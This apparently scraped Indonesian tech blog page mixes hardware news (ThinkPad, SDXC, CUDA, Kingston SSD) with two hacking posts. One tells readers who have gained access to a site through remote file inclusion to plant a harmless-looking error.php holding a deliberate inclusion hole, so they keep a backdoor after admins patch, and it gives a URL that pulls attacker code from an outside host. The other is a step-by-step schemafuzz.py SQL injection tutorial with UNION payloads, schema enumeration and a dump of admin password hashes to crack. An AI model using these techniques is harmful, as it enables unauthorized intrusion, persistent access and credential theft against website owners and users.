• Dual hard drives (dengan konfigurasi RAID) dan kapasitas hingga 960GB HDD dengan pilihan SSD
• DVD burner dan high speed UDMA compact Flash Reader,
• Mendukung koneksi Dual Link DVI, Display Port, VGA,
• 7-in-1 multicard reader, five USB ports, serta dukungan untuk WiMAX,
• fingerprint reader, a smartcard reader and hard-disk dengan feature enkripsi lengkap

Harga dan ketersediaan mobile workstation ThinkPad W700ds akan diinformasikan lebih lanjut.

Read rest of entry

SD Card 2 Terrabyte !!!

Secure Digital Association mengumumkan sebuah standar baru untuk SD card. Secure Digital Extended Capacity (SDXC) adalah format terkini yang mampu memiliki kapasitas hingga 2 Terrabyte (2.000 GB).

SDXC

Dalam pagelaran CES 2009 awal Januari ini, Secure Digital Association mengumumkan standar SD card terbaru yaitu SDXC. Setelah berulang-kali meningkatkan standar SD card (SD card, penambahan SDIO, dan SDHC), asosiasi ini mencanangkan standar dengan limitasi yang teramat tinggi. Rencananya, SDXC akan segera beredar di tahun 2009 ini untuk menembus batasan 32 GB pada SDHC. Kecepatannya dalam tahun 2009 ini dapat mencapai 104 MB/s. Sebagai catatan, SDHC class 6 hanya berkisar 6 MB/s. Rencananya, SDXC ini bahkan akan dapat mencapai kecepatan 300 MB/s. SDXC ini menggunakan Microsoft exFAT file system untuk dapat menggunakan kapasitas yang teramat besar. Jadi, bagi Anda yang hendak membeli perangkat yang memakai SD-card di pertengahan tahun nanti, pastikan perangkat tersebut sudah mendukung SDXC.

By : sdcard.org

Read rest of entry

NVIDIA CUDA

Ini adalah kampanye NVIDIA yang cukup menggelitik. Bukan, graphics plus tidak berarti bahwa NVIDIA menggembar-gemborkan kemampuan grafis yang hebat. Akan tetapi, kampanye ini menampilkan kemampuan GPU NVIDIA untuk mengerjakan pekerjaan di luar grafik. NVIDIA tampaknya cukup sadar bahwa graphics card saat ini sudah mulai kehilangan pamornya sebagai sarana bermain game saja. Perlu dicarikan jalan keluar agar pangsa pasar graphics card tidak terkunci pada gamer PC saja.CUDA (Compute Unified Device Architecture) adalah kata kuncinya. Sebuah GPU NVIDIA yang dilengkapi CUDA akan membuat graphics card tersebut berubah menjadi lebih dari sekadar pemroses grafik saja. CUDA adalah arsitektur parallel computing yang dikembangkan NVIDIA. Tujuannya sederhana, agar GPU dapat diakses oleh software dan dimanfaatkan sebagai sarana pemrosesan data yang bekerja secara paralel dengan prosesor.

CUDA dapat dianggap sebagai middle-ware atau perantara. Aplikasi yang hendak memanfaatkan GPU NVIDIA, cukup mengakses CUDA saja. CUDA yang akan mengatur penggunaan GPU dan pemanfaatan resource-nya. Pada software yang dibangun dengan C, hanya dibutuhkan sedikit modifikasi agar dapat memanfaatkan CUDA. Sementara itu, CUDA juga sudah dipersiapkan untuk kompatibel dengan DirectX 11 dan OpenCL.

CUDA sudah ada di dalam driver terbaru. Hingga saat ini, CUDA dapat diaktifkan pada GPU NVIDIA seri 8, 9, dan Quadro. Jadi, CUDA bukan hardware atau aksesoris yang harus dibeli secara terpisah. Singkat kata, CUDA tersedia secara gratis untuk para pengguna GPU NVIDIA terkini.

Read rest of entry

KINGSTON SSD

Solid State Drive (SSD) adalah teknologi yang sangat dinantikan untuk menggantikan hard disk. Kali ini, Kingston menghadirkan SSD-nya, yaitu SSDNow seri E dan M. Uniknya, SSD Kingston ini menggunakan basis SSD Intel.

Kingston SSDNow Seri E

SSD produk Intel adalah produk SSD pertama yang mencengangkan CHIP saat hadir di CHIP Test-Center. Kali ini, Kingston menghadirkan teknologi serupa dalam balutan nama Kingston SSDNow.

Kingston SSDNow seri M dan E hadir dalam dua kapasitas: 32 GB dan 80 GB. Memang belum mengagumkan, akan tetapi merupakan awal yang baik. Kecepatan tulis adalah yang membedakan kedua seri ini. Seri E adalah yang lebih cepat dengan kecepatan tulis 170 MB/s. Seri M seharusnya merupakan yang lebih ekonomis dengan menawarkan kecepatan tulis 70 MB/s. Uniknya, kedua jenis Kingston SSDNow ini memiliki kecepatan baca yang sama, 250 MB/s.

Kingston SSDNow Seri M

SSD dari Kingston menggunakan standar interface SATA harddisk drive. Akan tetapi, sebagaimana laykanya SSD, SSDNow ini sangat tangguh dan anti-benturan serta mampu bekerja dalam lingkungan yang ekstrim. Hal ini dimungkinkan karena tidak ada bagian yang dapat bergerak. SSDNow Kingston seri E dan M dilengkapi dengan S.M.A.R.T (Self-Monitoring, Analysis and Reporting Technology) untuk memantau integritas dan kehandalan drive. Drive ini didukung oleh garansi tiga tahun dan dukungan teknis gratis.

By : CHIP

Read rest of entry

Simple PHP Bacdoor

nah gini nich...

okeh langsung ajah

kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor

dan patch bugnya.

kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p

trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang

yang kita singkat namanya menjadi (MTPBDTDBO)

xixixxi chain_loader banget :p

nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi

kenapa ngga bikin bug aja sendiri :p

dengan asumsi para MTPBDTDBO tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan

langsung aja pas giliran kita dapet kesempatan upload atau cread file

langsung bikin nama file yang ngga mencurigakan misal

error.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan

kita contohkan dengan error.php

nah kita isi filenya dengan bug RFI

nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil

cara pakainya seperti inject RFI seperti biasa

error.php?error= <<>

misal:

http://kecemplungkalen.co.cc/error.php?error=http://webtempat.in/inject_kamu.txt???

dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita

pesan buat mafia tukang patch bug dan tukang delet backdoor orang (MTPBDTDBO)

sadarlah kalian wahai tukang delete backdor orang

By : Jasakom

Read rest of entry

Tutorial SQL Injection Dengan Menggunakan Schemafuzz.py

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

--------------

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

---------------

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

--------------------

cara untuk menemukan user dan password

kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password

eing ing eng....

jreennnng....keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database "webthings" Table "wt_users"

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz

NB:

Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.

By : Jasakom

Read rest of entry